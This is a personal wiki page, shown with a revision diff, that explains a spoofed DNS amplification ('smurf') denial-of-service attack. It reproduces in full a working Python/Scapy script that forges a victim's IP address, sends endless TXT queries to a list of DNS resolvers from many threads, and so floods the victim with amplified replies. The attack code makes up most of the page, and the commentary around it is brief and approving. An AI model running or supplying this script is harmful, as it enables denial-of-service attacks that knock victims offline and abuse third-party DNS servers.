DoS/DNSSmurf: Difference between revisions
From charlesreid1
(Created page with "Haven't found a tool for doing this, only a script on pastebin: http://pastebin.com/gTxRQuFY Here's how it works: * Read in a list of DNS servers * Start a large thread pool...") |
No edit summary |
||
| Line 10: | Line 10: | ||
* Send a crafted DNS request to each server | * Send a crafted DNS request to each server | ||
The real money shot here | The real money shot is here: the use of Scapy to craft the DNS request: | ||
<pre> | <pre> | ||
p=IP(dst=List[count],src=host) | |||
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query | |||
send(p/u,verbose=0) | |||
</pre> | </pre> | ||
Revision as of 23:27, 24 August 2016
Haven't found a tool for doing this, only a script on pastebin: http://pastebin.com/gTxRQuFY
Here's how it works:
- Read in a list of DNS servers
- Start a large thread pool
- With each thread in the pool, run the attack function
The attack function works as follows:
- Loop over entire list of DNS servers
- Send a crafted DNS request to each server
The real money shot is here: the use of Scapy to craft the DNS request:
p=IP(dst=List[count],src=host) u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query send(p/u,verbose=0)
It's sending a UDP over IP packet to one of the DNS servers found in the file, and setting it to look like it came from the sheep. The DNS packet is sent to port 53, and a random destination port is set. The DNS request is for "goo.gl".
This is simply run repeatedly, ad infinitum, by as many servers and threads as you'd like, with as many DNS servers as you'd like.
dnssmurf.py:
#!/usr/bin/env python
######################
# DNS AMP dos attack #
# by K-Metal #
######################
from scapy.all import *
import threading, sys, random, time
#Proof of Concept
if len(sys.argv) < 2: #Print Help
print "Usage: "+sys.argv[0]+" <ip> <list> <threads>"
sys.exit()
host = sys.argv[1] #Variables
File = sys.argv[2]
numthreads = int(sys.argv[3])
threads = []
with open(File) as f: #Read list
List = f.readlines()
Max = len(List) #Max length of the list
def flood():
global host
global List
global Max
print "Flooding..."
while True:
count = 0
while count < Max:
p=IP(dst=List[count],src=host)
u=UDP(dport=53,sport=random.randint(1024,65535))/DNS(rd=1,qd=DNSQR(qname="goo.gl", qtype="TXT")) #DNS Query
send(p/u,verbose=0)
for n in range(numthreads): #Multi-threading
t = threading.Thread(target=flood)
t.daemon = True
t.start()
threads.append(t)
while True: #So CTRL+C kills all threads
time.sleep(1)